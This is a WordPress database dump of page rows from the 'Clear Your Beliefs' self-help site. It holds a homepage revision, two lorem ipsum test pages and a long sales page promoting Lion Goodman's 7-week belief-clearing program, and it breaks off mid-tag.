(2078, 2, '2015-01-08 20:02:53', '2015-01-09 01:02:53', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;margin: 0px 5%">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center"><a href="http://www.clearbeliefs.com" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="__blank"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2015-01-08 20:02:53', '2015-01-09 01:02:53', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2080, 2, '2015-01-12 00:34:17', '2015-01-12 05:34:17', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus ante dapibus diam. Sed nisi. Nulla quis sem at nibh elementum imperdiet. Duis sagittis ipsum. Praesent mauris. Fusce nec tellus sed augue semper porta. Mauris massa. Vestibulum lacinia arcu eget nulla. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. \r\n\r\nCurabitur sodales ligula in libero. Sed dignissim lacinia nunc. Curabitur tortor. Pellentesque nibh. Aenean quam. In scelerisque sem at dolor. Maecenas mattis. Sed convallis tristique sem. Proin ut ligula vel nunc egestas porttitor. Morbi lectus risus, iaculis vel, suscipit quis, luctus non, massa. Fusce ac turpis quis ligula lacinia aliquet. Mauris ipsum. Nulla metus metus, ullamcorper vel, tincidunt sed, euismod in, nibh. Quisque volutpat condimentum velit. \r\n\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nam nec ante. Sed lacinia, urna non tincidunt mattis, tortor neque adipiscing diam, a cursus ipsum ante quis turpis. Nulla facilisi. Ut fringilla. Suspendisse potenti. Nunc feugiat mi a tellus consequat imperdiet. Vestibulum sapien. Proin quam. Etiam ultrices. Suspendisse in justo eu magna luctus suscipit. \r\n\r\nSed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae pharetra auctor, sem massa mattis sem, at interdum magna augue eget diam. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Morbi lacinia molestie dui. Praesent blandit dolor. Sed non quam. In vel mi sit amet augue congue elementum. Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada tellus. Ut ultrices ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar ullamcorper. \r\n\r\nNulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a tortor. Integer id quam. Morbi mi. Quisque nisl felis, venenatis tristique, dignissim in, ultrices sit amet, augue. Proin sodales libero eget ante. Nulla quam. Aenean laoreet. Vestibulum nisi lectus, commodo ac, facilisis ac, ultricies eu, pede. Ut orci risus, accumsan porttitor, cursus quis, aliquet eget, justo. \r\n', 'Test Page', '', 'publish', 'closed', 'open', '', 'test-page', '', '', '2015-01-12 00:35:06', '2015-01-12 05:35:06', '', 0, 'http://clearyourbeliefs.com/?page_id=2080', 0, 'page', '', 0),
(2081, 2, '2015-01-12 00:33:27', '2015-01-12 05:33:27', 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus ante dapibus diam. Sed nisi. Nulla quis sem at nibh elementum imperdiet. Duis sagittis ipsum. Praesent mauris. Fusce nec tellus sed augue semper porta. Mauris massa. Vestibulum lacinia arcu eget nulla. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. \r\n\r\nCurabitur sodales ligula in libero. Sed dignissim lacinia nunc. Curabitur tortor. Pellentesque nibh. Aenean quam. In scelerisque sem at dolor. Maecenas mattis. Sed convallis tristique sem. Proin ut ligula vel nunc egestas porttitor. Morbi lectus risus, iaculis vel, suscipit quis, luctus non, massa. Fusce ac turpis quis ligula lacinia aliquet. Mauris ipsum. Nulla metus metus, ullamcorper vel, tincidunt sed, euismod in, nibh. Quisque volutpat condimentum velit. \r\n\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nam nec ante. Sed lacinia, urna non tincidunt mattis, tortor neque adipiscing diam, a cursus ipsum ante quis turpis. Nulla facilisi. Ut fringilla. Suspendisse potenti. Nunc feugiat mi a tellus consequat imperdiet. Vestibulum sapien. Proin quam. Etiam ultrices. Suspendisse in justo eu magna luctus suscipit. \r\n\r\nSed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae pharetra auctor, sem massa mattis sem, at interdum magna augue eget diam. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Morbi lacinia molestie dui. Praesent blandit dolor. Sed non quam. In vel mi sit amet augue congue elementum. Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada tellus. Ut ultrices ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar ullamcorper. \r\n\r\nNulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a tortor. Integer id quam. Morbi mi. Quisque nisl felis, venenatis tristique, dignissim in, ultrices sit amet, augue. Proin sodales libero eget ante. Nulla quam. Aenean laoreet. Vestibulum nisi lectus, commodo ac, facilisis ac, ultricies eu, pede. Ut orci risus, accumsan porttitor, cursus quis, aliquet eget, justo. \r\n', 'Test Page', '', 'inherit', 'closed', 'open', '', '2080-revision-v1', '', '', '2015-01-12 00:33:27', '2015-01-12 05:33:27', '', 2080, 'http://clearyourbeliefs.com/2080-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2084, 2, '2015-02-06 02:54:55', '2015-02-06 07:54:55', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" 